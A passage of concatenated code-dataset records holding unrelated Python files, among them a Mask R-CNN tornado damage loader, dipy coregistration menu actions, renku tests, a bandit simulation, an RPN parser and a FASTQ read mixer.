partner_id.saldo + self.topup\n\t\t\tpartner_id.write({'saldo' : saldo})","sub_path":"wizard/top_up.py","file_name":"top_up.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367997870","text":"\"\"\"\ntornado.py\ntornado dataset package\n\nZhiang Chen, Nov 2018\n\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport skimage.draw\nimport pickle\nimport argparse\nimport matplotlib.pyplot as plt\n\nfrom mrcnn import visualize\nfrom mrcnn.config import Config\nfrom mrcnn import model as modellib, utils\n\nROOT_DIR = os.path.abspath(\"../../\")\nsys.path.append(ROOT_DIR) # To find local version of the library\n\n# Path to trained weights file\nCOCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5\")\n\n# Directory to save logs and model checkpoints, if not provided\n# through the command line argument --logs\nDEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n############################################################\n# Dataset config\n############################################################\nclass TornadoConfig(Config):\n NAME = \"tornado\"\n GPU_COUNT = 1 # cannot create model when setting gpu count as 2\n \n IMAGES_PER_GPU = 1\n NUM_CLASSES = 1 + 2 # Background + non-damaged + damaged\n IMAGE_MIN_DIM = 800\n IMAGE_MAX_DIM = 1024\n \n RPN_ANCHOR_SCALES = (16, 64, 128, 256, 512)\n # IMAGE_CHANNEL = 1 # wrong, the input will be automatically converted to 3 channels (if greyscale, rgb will be repeated)\n \n STEPS_PER_EPOCH = 100\n DETECTION_MIN_CONFIDENCE = 0.9\n \n \n MAX_GT_INSTANCES = 100\n \n DETECTION_MAX_INSTANCES = 100\n \n TRAIN_ROIS_PER_IMAGE = 500\n \n############################################################\n# Dataset\n############################################################\nclass TornadoDataset(utils.Dataset):\n \n def load_tornado(self, datadir, subset):\n self.add_class(\"tornado\", 1, \"ndr\")\n self.add_class(\"tornado\", 2, \"dr\")\n \n assert subset in [\"train\", \"val\"]\n dataset_dir = os.path.join(datadir, subset)\n \n files = os.listdir(dataset_dir)\n \n image_id = 0\n for file in files:\n if '.jpg' in file:\n image_path = os.path.join(dataset_dir, file)\n assert os.path.isfile(image_path)\n \n annotation_path = os.path.join(dataset_dir, file.split('.')[0]+'.npy')\n assert os.path.isfile(annotation_path)\n \n #image = skimage.io.imread(image_path)\n height, width = 800, 800\n \n self.add_image(\n \"tornado\",\n image_id=image_id,\n path=image_path,\n width=width, \n height=height,\n annotation_path=annotation_path)\n \n image_id += 1\n \n \n def load_mask(self, image_id):\n info = self.image_info[image_id]\n if info[\"source\"] != \"tornado\":\n return super(self.__class__, self).load_mask(image_id)\n \n mask = np.load(info[\"annotation_path\"])\n \n if len(mask.shape) == 2:\n h,w = mask.shape\n mask_ = mask.reshape((h,w,1)).astype(np.bool)\n return mask_, np.zeros(1).astype('int32')\n \n else:\n h,w,c = mask.shape\n mask_ = np.zeros(mask.shape, dtype='uint8')\n mask_ = np.logical_or(mask, mask_)\n classes = []\n for i in range(c):\n if 50 < mask[:,:,i].max() < 180:\n classes.append(1)\n elif 200 < mask[:,:,i].max() < 260:\n classes.append(2)\n else:\n classes.append(0)\n classes = np.asarray(classes, dtype=np.int32)\n \n return mask_, classes\n\n def image_reference(self, image_id):\n info = self.image_info[image_id]\n if info[\"source\"] == \"tornado\":\n return info[\"path\"]\n else:\n super(self.__class__, self).image_reference(image_id)\n \n def display_mask(self, image_id):\n masks, ids = self.load_mask(image_id)\n mask = masks.max(2)\n plt.imshow(mask)\n plt.show()\n \n \nif __name__ == '__main__':\n config = TornadoConfig()\n config.display()\n dataset = TornadoDataset()\n dataset.load_tornado('../../dataset/tornado', 'train')\n m, cls = dataset.load_mask(0)\n print(m[0,:,:].max())\n print(cls)\n print(dataset.image_reference(0))","sub_path":"samples/tornado/tornadoo.py","file_name":"tornadoo.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603355642","text":"from dbdicom.wrappers import dipy\nfrom wezel.gui import Action, Menu\n\n\ndef _if_a_series_is_selected(app):\n return app.nr_selected('Series') != 0\n\ndef _if_a_database_is_open(app):\n return app.database() is not None\n\ndef _never(app):\n return False\n\n\ndef median_otsu(app):\n\n # Get user input\n cancel, f = app.dialog.input(\n {\"label\":\"Median Radius\", \"type\":\"integer\", \"value\": 2, 'minimum':1},\n {\"label\":\"Numpass\", \"type\":\"integer\", \"value\": 1, 'minimum':1},\n title = 'Select Thresholding settings')\n if cancel: \n return\n\n # Filter series\n series = app.selected('Series')\n for sery in series:\n mask_series, mask = dipy.median_otsu(\n sery, \n median_radius=f[0]['value'], \n numpass=f[1]['value'],\n )\n mask_series.remove()\n app.display(mask)\n app.refresh()\n\n\ndef _invert_deformation_field(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Deformation field\", \"type\":\"select record\", \"options\": series, 'default': sel},\n {\"label\":\"Maximum number of iterations\", \"type\":\"integer\", \"value\": 10, 'minimum':1},\n {\"label\":\"Tolerance\", \"type\":\"float\", \"value\":0.1, 'minimum':0.001},\n title = \"Invert deformation field\")\n if cancel:\n return\n deform_inv = dipy.invert_deformation_field(f[0], max_iter=f[1]['value'], tolerance=f[2]['value'])\n app.display(deform_inv)\n app.refresh()\n\n\ndef warp(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Series to warp\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Deformation field\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Interpolate? \", \"type\":\"dropdownlist\", \"list\": ['Yes', 'No'], 'value':0},\n title = \"Warp series with deformation field..\")\n if cancel:\n return\n warped = dipy.warp(f[0], f[1], \n interpolate = True if f[2]==0 else False)\n app.display(warped)\n app.refresh()\n\n\ndef _align_center_of_mass_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving image\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed image\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"Align center of mass (3D)\")\n if cancel:\n return\n moved = dipy.align_center_of_mass_3d(f[0], f[1])\n app.display(moved)\n app.refresh()\n\n\ndef coregister_deformable_2d_to_2d(app):\n series = app.database().series()\n sel = app.selected('Series')\n metric = [\"Cross-Correlation\", 'Expectation-Maximization', 'Sum of Squared Differences']\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Metric\", \"type\":\"dropdownlist\", \"list\": metric, 'value':0},\n title = \"Please select 2D to 2D coregistration settings\")\n if cancel:\n return\n coregistered, deformation = dipy.coregister_2d_to_2d(f[0], f[1],\n transformation = 'Symmetric Diffeomorphic',\n metric = metric[f[2][\"value\"]],\n )\n app.display(coregistered)\n app.display(deformation)\n app.refresh()\n\n\ndef _coregister_translation_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"3D coregistration with translation\")\n if cancel:\n return\n coregistered = dipy.coregister_translation_3d(f[0],f[1])\n app.display(coregistered)\n app.refresh()\n\n\ndef _coregister_rigid_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"3D coregistration with translation & rotation\")\n if cancel:\n return\n coregistered = dipy.coregister_rigid_3d(f[0],f[1])\n app.display(coregistered)\n app.refresh()\n\n\ndef _coregister_affine_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"3D coregistration with affine transformation\")\n if cancel:\n return\n coregistered = dipy.coregister_affine_3d(f[0],f[1])\n app.display(coregistered)\n app.refresh()\n\n\ndef coregister_deformable_3d_to_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n metric = [\"Cross-Correlation\", 'Expectation-Maximization', 'Sum of Squared Differences']\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Metric\", \"type\":\"dropdownlist\", \"list\": metric, 'value':0},\n title = \"Please select 3D to 3D coregistration settings\")\n if cancel:\n return\n coregistered, deformation = dipy.coregister_3d_to_3d(f[0], f[1],\n transformation = 'Symmetric Diffeomorphic',\n metric = metric[f[2][\"value\"]])\n app.display(coregistered)\n app.display(deformation)\n app.refresh()\n\n\n# Segmentation\naction_median_otsu = Action('Median Otsu segmentation', on_clicked=median_otsu, is_clickable=_if_a_series_is_selected)\n\n# Coregistration\naction_align_center_of_mass_3d = Action('Align center of mass (3D)', on_clicked=_align_center_of_mass_3d, is_clickable=_if_a_database_is_open)\naction_coregister_translation_3d = Action('Coregister (Translation - 3D)', on_clicked=_coregister_translation_3d, is_clickable=_if_a_database_is_open)\naction_align_moments_of_inertia_2d = Action('Align moments of inertia (2D)', on_clicked=_never, is_clickable=_never)\naction_align_moments_of_inertia_3d = Action('Align moments of inertia (3D)', on_clicked=_never, is_clickable=_never)\naction_coregister_rigid_2d = Action('Coregister (Rigid - 2D)', on_clicked=_never, is_clickable=_never)\naction_coregister_rigid_3d = Action('Coregister (Rigid - 3D)', on_clicked=_coregister_rigid_3d, is_clickable=_if_a_database_is_open)\naction_coregister_affine_2d = Action('Coregister (Affine - 2D)', on_clicked=_never, is_clickable=_never)\naction_coregister_affine_3d = Action('Coregister (Affine - 3D)', on_clicked=_coregister_affine_3d, is_clickable=_if_a_database_is_open)\naction_coregister_deformable_2d_to_2d = Action('Coregister (Deformable - 2D)', on_clicked=coregister_deformable_2d_to_2d, is_clickable=_if_a_database_is_open)\naction_coregister_deformable_3d_to_3d = Action('Coregister (Deformable - 3D)', on_clicked=coregister_deformable_3d_to_3d, is_clickable=_if_a_database_is_open)\naction_warp = Action('Warp', on_clicked=warp, is_clickable=_if_a_database_is_open)\naction_invert_deformation = Action('Invert deformation field', on_clicked=_invert_deformation_field, is_clickable=_if_a_database_is_open)\n\n\nmenu_all = Menu('dipy')\nmenu_all.add(action_median_otsu)\nmenu_all.add_separator()\nmenu_all.add(action_align_center_of_mass_3d)\nmenu_all.add(action_coregister_translation_3d)\nmenu_all.add_separator()\nmenu_all.add(action_align_moments_of_inertia_2d)\nmenu_all.add(action_align_moments_of_inertia_3d)\nmenu_all.add(action_coregister_rigid_2d)\nmenu_all.add(action_coregister_rigid_3d)\nmenu_all.add_separator()\nmenu_all.add(action_coregister_affine_2d)\nmenu_all.add(action_coregister_affine_3d)\nmenu_all.add_separator()\nmenu_all.add(action_coregister_deformable_2d_to_2d)\nmenu_all.add(action_coregister_deformable_3d_to_3d)\nmenu_all.add_separator()\nmenu_all.add(action_warp)\nmenu_all.add(action_invert_deformation)\n\n\n\nmenu_coreg = Menu('Coregister (dipy)')\nmenu_coreg.add(action_align_center_of_mass_3d)\nmenu_coreg.add(action_coregister_translation_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_align_moments_of_inertia_2d)\nmenu_coreg.add(action_align_moments_of_inertia_3d)\nmenu_coreg.add(action_coregister_rigid_2d)\nmenu_coreg.add(action_coregister_rigid_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_coregister_affine_2d)\nmenu_coreg.add(action_coregister_affine_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_coregister_deformable_2d_to_2d)\nmenu_coreg.add(action_coregister_deformable_3d_to_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_warp)\nmenu_coreg.add(action_invert_deformation)\n\n\n\n","sub_path":"src/wezel/plugins/dipy.py","file_name":"dipy.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552191679","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2019-2020 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Repository tests.\"\"\"\n\nimport tempfile\nfrom pathlib import Path\n\nfrom renku import LocalClient\nfrom renku.core.commands.dataset import create_dataset\n\n\ndef test_latest_version(project):\n \"\"\"Test returning the latest version of `SoftwareAgent`.\"\"\"\n from renku import __version__\n\n create_dataset().build().execute(\"ds1\", title=\"\", description=\"\", creators=[])\n\n agent_version = LocalClient(project).latest_agent\n assert __version__ == agent_version\n\n\ndef test_latest_version_user_commits(project):\n \"\"\"Test retrieval of `SoftwareAgent` with latest non-renku command.\"\"\"\n from git import Repo\n\n from renku import __version__\n\n create_dataset().build().execute(\"ds1\", title=\"\", description=\"\", creators=[])\n\n myfile = Path(\"myfile\")\n myfile.write_text(\"123\")\n\n repo = Repo(project)\n repo.index.add([str(myfile)])\n repo.index.commit(\"added myfile\")\n\n agent_version = LocalClient(project).latest_agent\n assert __version__ == agent_version\n\n\ndef test_init_repository(local_client):\n \"\"\"Test initializing an empty repository.\"\"\"\n local_client.init_repository()\n assert (local_client.path / \".git\").exists()\n assert (local_client.path / \".git\" / \"HEAD\").exists()\n assert not (local_client.path / \".renku\").exists()\n\n\ndef test_import_from_template(local_client):\n \"\"\"Test importing data from template.\"\"\"\n output_file = \"metadata.yml\"\n local_client.init_repository()\n with tempfile.TemporaryDirectory() as tempdir:\n template_path = Path(tempdir)\n fake_template_file = template_path / output_file\n with fake_template_file.open(\"w\") as dest:\n dest.writelines(\n [\n \"name: {{ name }}\",\n \"description: {{ description }}\",\n \"created: {{ date_created }}\",\n \"updated: {{ date_updated }}\",\n ]\n )\n metadata = {\n \"name\": \"name\",\n \"description\": \"description\",\n \"date_created\": \"now\",\n \"date_updated\": \"now\",\n \"__template_source__\": \"renku\",\n \"__template_ref__\": \"master\",\n \"__template_id__\": \"python-minimal\",\n \"__namespace__\": \"\",\n \"__repository__\": \"\",\n \"__project_slug__\": \"\",\n }\n local_client.import_from_template(template_path, metadata)\n compiled_file = local_client.path / output_file\n compiled_content = compiled_file.read_text()\n expected_content = \"name: name\" \"description: description\" \"created: now\" \"updated: now\"\n assert expected_content == compiled_content\n","sub_path":"tests/core/management/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586586716","text":"from django.urls import path,include\r\nfrom . import views\r\napp_name='medical'\r\n\r\nurlpatterns = [\r\n # path('',views.predict,name='predict'),\r\n # path('',views.index,name='index'),\r\n path('create',views.create,name='create'),\r\n path('image_ocr',views.image_ocr,name='image_ocr'),\r\n path('camimg',views.camimg,name='camimg'),\r\n]","sub_path":"medical/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104987092","text":"from utils import *\nfrom tests import *\nfrom config import *\nfrom controller import *\nfrom solvers import *\nfrom matplotlib.pyplot import figure\n\n\ndebug = True\nconfig = [ucb_config, epsilon_decay_config,\n epsilon_greedy_config, tit_for_tat_config]\n# config = [ucb_config]\nstochastic_policy = \"./Test Files/Prisoners Transition.csv\"\nget_regret = True\nnum_timesteps = 10000\n\nreward_save_path = (\"./Figures/Stochastic Agents/UCB/b_Stochastic_UCB_%s80.png\" \n %(\"regret\" if get_regret else \"reward\"))\n\naction_save_path = \"./Figures/Stochastic Agents/UCB/b_Stochastic_UCB_Actions80.png\"\n\n\ndef testUtils():\n prisoners_test()\n\ndef runFromConfig(config, get_regret = get_regret, stochastic_policy = None):\n config.reward_dict = n_agent_rewards(config.reward_matrix_filepath)\n #this can be made cleaner just don't want to right now sorry\n \n config.car_agent = config.car_policy(num_actions = config.num_actions,\n eps = config.eps)\n config.agents = []\n for agent in config.agent_policies:\n config.agents.append(agent(num_actions = config.num_actions))\n\n bandit = run_multi_armed_bandit(reward_dict = config.reward_dict,\n car_policy = config.car_agent,\n agent_policies = config.agents,\n max_timesteps = num_timesteps,\n get_regret = get_regret,\n stochastic_policy = stochastic_policy)\n\n\n\n return_val = bandit.run_simulation()\n if isinstance(config.car_agent, ucb1):\n pass #was using for debuggin\n # print bandit.car_policy.Q\n return return_val\n\n\n\ndef runRepeatedSimulation(configs, transition_policy):\n legend = []\n lines = []\n action_dict = {}\n color_dict = {}\n figure(num=None, figsize=(8, 6), dpi=80, facecolor='w', edgecolor='k')\n\n for config in configs:\n overall_car_regret, overall_agent_regret = [], []\n actions = []\n for _ in range(config.num_sims):\n car_regret, agent_regret, car_actions = runFromConfig(config, \n stochastic_policy = transition_policy)\n \n overall_car_regret.append(copy.copy(car_regret))\n overall_agent_regret.append(copy.copy(agent_regret))\n\n # with open (\"actions.txt\", \"a\") as f:\n # f.write(\"NEW SECTION\\n\")\n actions.append(np.array(car_actions).copy())\n\n action_dict[config.name] = np.array(actions).copy()\n\n lines.append(plot_car_regret(overall_car_regret, \n config.color, config.color_,\n config.name, \n axis_label = \"Regret\" if get_regret else\n \"Reward\"))\n legend.append(config.name)\n color_dict[config.name] = (config.color, config.color_)\n\n plt.legend(lines, legend)\n plt.savefig(reward_save_path)\n\n plt.clf()\n\n plot_actions(action_dict, color_dict = color_dict)\n plt.savefig(action_save_path)\n\n\n\n\n\n\ndef main():\n if debug:\n testUtils()\n\n if stochastic_policy is not None:\n transition_policy = load_stochastic_transitions(stochastic_policy, config[0].num_actions)\n\n runRepeatedSimulation(config, transition_policy)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"595705386","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n#HINT 1: https://www.google.com/search?q=how+to+round+number+to+2+decimal+places+python&oq=how+to+round+number+to+2+decimal\n#HINT 2: https://www.kite.com/python/answers/how-to-limit-a-float-to-two-decimal-places-in-python\nbill = float(input('How much was the bill '))\nperc=float(input('what percentage you want, 10, 12 or 15 '))\nnumber=float(input('How many people '))\n\ntip = (bill/number)*(1+(perc/100))\nprint(\"{:.2f}\".format(round(tip,2)))\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"45625563","text":"import pytest\nimport numpy as np\nfrom aos.solver import Solver, SensitivitySolver\n\ndef test_abstract_solver():\n with pytest.raises(TypeError):\n Solver()\n\ndef test_sensitivity_solver_nominal():\n solver = SensitivitySolver()\n y0 = np.zeros(len(solver.y0) + 1)\n # hack because Noll (1976) indexing starts from j=1\n y0[1:] = solver.y0\n xest = solver.solve(y0)\n ref = np.zeros(20)\n\n np.testing.assert_allclose(xest.array, ref)\n","sub_path":"tests/test_solver.py","file_name":"test_solver.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"331082554","text":"import my_token\n\n\ndef get_rpn(i: int, tokens_type):\n res = []\n stack_idx = []\n error = \"\"\n while tokens_type[i] != my_token.SEMI:\n if tokens_type[i] == my_token.INT_NUMBER or tokens_type[i] == my_token.DOUBLE_NUMBER or tokens_type[i] in [my_token.FALSE, my_token.TRUE]:\n res.append(i)\n i += 1\n continue\n elif tokens_type[i] == my_token.IDENTIFIER:\n res.append(i)\n if tokens_type[i + 1] == my_token.LPAR:\n i += 1\n while tokens_type[i] != my_token.RPAR:\n i += 1\n # if tokens_type[i] == my_token.LPAR:\n # i += 1\n i += 1\n continue\n elif my_token.is_operator(tokens_type[i]):\n if tokens_type[i] == my_token.OPERATOR_POWER: # оператор возведения в степень правоассоциативна\n if len(stack_idx) == 0:\n stack_idx.append(i)\n else:\n while my_token.get_priority(tokens_type[i]) > my_token.get_priority(tokens_type[stack_idx[-1]]):\n res.append(stack_idx.pop())\n if len(stack_idx) == 0:\n break\n stack_idx.append(i)\n else:\n if len(stack_idx) == 0:\n stack_idx.append(i)\n else:\n while (tokens_type[stack_idx[-1]] != my_token.LPAR) and \\\n (my_token.get_priority(tokens_type[i]) >= my_token.get_priority(tokens_type[stack_idx[-1]])):\n res.append(stack_idx.pop())\n if len(stack_idx) == 0:\n break\n stack_idx.append(i)\n i += 1\n continue\n elif tokens_type[i] == my_token.LPAR:\n stack_idx.append(i)\n i += 1\n continue\n elif tokens_type[i] == my_token.RPAR:\n # if len(stack_idx) != 0:\n while tokens_type[stack_idx[-1]] != my_token.LPAR:\n res.append(stack_idx.pop())\n if len(stack_idx) == 0:\n break\n # else:\n # stack_idx.append(i)\n if tokens_type[stack_idx[-1]] == my_token.LPAR:\n stack_idx.pop()\n else:\n error = \"В выражжении неправельно расставлены скобки\"\n i += 1\n continue\n else:\n break\n if len(stack_idx) != 0:\n while len(stack_idx) != 0:\n res.append(stack_idx.pop())\n return i, res, error\n\n\n","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"455970034","text":"import random\n\n\ndef main():\n while True:\n greetings = ['hi', 'HI', 'Hi']\n questionsoffeelings = ['How are you?', 'How are you doing?', 'How are you feeling?']\n answersforfeelings = ['Good, yourself?', 'Shitty. :(']\n\n userInput = input(\">>> \")\n if userInput in greetings:\n print(\"Hello\")\n elif userInput in questionsoffeelings:\n print(random.choice(answersforfeelings))\n else:\n print(\"I do not understand you.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"JoeExp/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"349010180","text":"#! /usr/bin/env python3\n\nimport argparse\nimport os\nimport random\nimport math\n\n# number of reads taken in a single run\nREADS_IN_GROUP=10\n\nallowed_modes = [\n\t\t\t\"single-end\",\n\t\t\t\"paired-end-bwa\",\n\t\t\t\"paired-end-bfast\",\n\t\t]\n\nclass Mixer:\n\tdef __init__(self,mode,input_files,output_prefix):\n\t\tself.mode=mode\n\t\tself.input_files=input_files\n\t\tself.output_prefix=output_prefix\n\t\tself.rng=random.Random()\n\t\tself.rng.seed(1)\n\n\t\tself.i_files=[open(fn) for fn in input_files]\n\t\tself.i_files_sizes=[os.path.getsize(fn) for fn in input_files]\n\t\tself.i_files_proc=[int((100.0*x)/sum(self.i_files_sizes)) for x in self.i_files_sizes]\n\t\tself.i_files_weighted=[]\n\t\tfor i in range(len(self.i_files)):\n\t\t\tself.i_files_weighted.extend(self.i_files_proc[i]*[self.i_files[i]])\n\n\t\tread_id_length_est=math.ceil(\n\t\t\t\t\tmath.log(\n\t\t\t\t\t\tsum(self.i_files_sizes)/20,\n\t\t\t\t\t\t16,\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\tif args.m==\"single-end\":\n\t\t\tself.output=Output(fn_1=\"{}.fq\".format(output_prefix),reads_in_tuple=1,read_id_length=read_id_length_est)\n\t\t\tself._reads_in_tuple=1\n\t\telif args.m==\"paired-end-bwa\":\n\t\t\tself.output=Output(fn_1=\"{}.1.fq\".format(output_prefix),fn_2=\"{}.2.fq\".format(output_prefix),reads_in_tuple=2,read_id_length=read_id_length_est)\n\t\t\tself._reads_in_tuple=2\n\t\telif args.m==\"paired-end-bfast\":\n\t\t\tself.output=Output(fn_1=\"{}.fq\".format(output_prefix),reads_in_tuple=2,read_id_length=read_id_length_est)\n\t\t\tself._reads_in_tuple=2\n\t\telse:\n\t\t\traise ValueError(\"Unknown mode '{}'\".format(args.m))\n\n\tdef run(self):\n\t\twhile len(self.i_files_weighted)>0:\n\t\t\tfile_id=self.rng.randint(0,len(self.i_files_weighted)-1)\n\t\t\tfor i in range(READS_IN_GROUP*self._reads_in_tuple):\n\t\t\t\tif self.i_files_weighted[file_id].closed:\n\t\t\t\t\tdel self.i_files_weighted[file_id]\n\t\t\t\t\tbreak\n\n\t\t\t\tln1=self.i_files_weighted[file_id].readline()\n\t\t\t\tln2=self.i_files_weighted[file_id].readline()\n\t\t\t\tln3=self.i_files_weighted[file_id].readline()\n\t\t\t\tln4=self.i_files_weighted[file_id].readline()\n\n\t\t\t\tif not ln1:\n\t\t\t\t\tself.i_files_weighted[file_id].close()\n\t\t\t\t\tdel self.i_files_weighted[file_id]\n\t\t\t\t\tbreak\n\t\t\t\tself.output.save_read(ln1,ln2,ln3,ln4)\n\n\nclass Output:\n\tdef __init__(self,reads_in_tuple,fn_1,fn_2=None,read_id_length=6):\n\t\tself.reads_in_tuple=reads_in_tuple\n\t\tself.read_id_length=read_id_length\n\t\tself.fs=[open(fn_1,\"w+\")]\n\t\tif fn_2 is not None:\n\t\t\tself.fs.append(open(fn_2,\"w+\"))\n\t\tself.read_tuple_counter=0\n\n\tdef __del__(self):\n\t\tfor f in self.fs:\n\t\t\tf.close()\n\n\tdef save_read(self,ln1,ln2,ln3,ln4):\n\t\t[ln1,ln2,ln3,ln4]=[ln1.strip(),ln2.strip(),ln3.strip(),ln4.strip()]\n\n\t\tln1_parts=ln1.split(\"__\")\n\t\tln1_parts[1]=\"{:x}\".format(self.read_tuple_counter).zfill(self.read_id_length)\n\t\tln1=\"__\".join(ln1_parts)\n\t\n\t\tif self.reads_in_tuple==1:\n\t\t\tfile_id=0\n\t\t\tif ln1[-2]==\"/\":\n\t\t\t\traise ValueError(\"Wrong read name '{}'. Single end read should not contain '/'.\".format(ln1[1:]))\n\t\t\tself.read_tuple_counter+=1\n\t\n\t\telse:\n\t\t\tif ln1[-2]!=\"/\":\n\t\t\t\traise ValueError(\"Wrong read name '{}'. A read with two ends should contain '/'.\".format(ln1[1:]))\n\t\t\tif len(self.fs)==1:\n\t\t\t\tln1=ln1[:-2]\n\t\t\t\tfile_id=0\n\t\t\t\tself.read_tuple_counter+=1\n\t\t\telse:\n\t\t\t\tif ln1[-1]==\"1\":\n\t\t\t\t\tfile_id=0\n\t\t\t\telif ln1[-1]==\"2\":\n\t\t\t\t\tfile_id=1\n\t\t\t\t\tself.read_tuple_counter+=1\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(\"Wrong read name '{}'.\".format(ln1[1:]))\n\n\t\tself.fs[file_id].write(\"\".join([ln1,os.linesep,ln2,os.linesep,ln3,os.linesep,ln4,os.linesep]))\n\n\nparser = argparse.ArgumentParser(\n\t\t\tdescription=\"Join FASTQ files with reads in RNF format.\",\n\t\t\tepilog=\"Source FASTQ files should satisfy the following conditions:\"\n\t\t\t\t\t\" 1) Each file contains only reads corresponding to one genome (with the same genome id).\"\n\t\t\t\t\t\" 2) All files contain reads of the same type (single-end / paired-end).\"\n\t\t\t\t\t\" 3) Reads with more reads per tuple (e.g., paired-end) have '/1', etc. in suffix (for identification of nb of read).\"\n\t\t)\n\nparser.add_argument(\n\t\t'-i',\n\t\trequired=True,\n\t\tmetavar='inp',\n\t\tnargs='+',\n\t\thelp='input FASTQ files',\n\t)\n\nparser.add_argument(\n\t\t'-m',\n\t\trequired=True,\n\t\tmetavar='mode',\n\t\tchoices=allowed_modes,\n\t\t#type=lambda x: is_valid_mode(parser,x),\n\t\thelp='mode for joining files (single-end / paired-end-bwa / paired-end-bfast)',\n\t)\n\n\nparser.add_argument(\n\t\t'-o',\n\t\tmetavar='out',\n\t\trequired=True,\n\t\thelp='output prefix',\n\t)\n\nargs = parser.parse_args()\n\noutpref=args.o\ninp_fastqs=args.i\n\nmixer=Mixer(\n\t\tmode=args.m,\n\t\tinput_files=args.i,\n\t\toutput_prefix=args.o,\n\t)\nmixer.run()\n\n","sub_path":"bin/rnf-join-fq.py","file_name":"rnf-join-fq.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"307831184","text":"import warnings\nfrom enum import Enum\n\nimport numpy as np\nimport pyqtgraph as pg\nfrom scipy.signal.windows import hann\n\nfrom PyQt5 import QtCore\n\nimport acconeer.exptool as et\n\nimport csv # For simple DB\n\nHALF_WAVELENGTH = 2.445e-3 # m\nHISTORY_LENGTH = 2.0 # s\nEST_VEL_HISTORY_LENGTH = HISTORY_LENGTH # s\nSD_HISTORY_LENGTH = HISTORY_LENGTH # s\nNUM_SAVED_SEQUENCES = 100\nSEQUENCE_TIMEOUT_LENGTH = 0.5 # s\n\n# Byt till mph från /s (ty i golf används 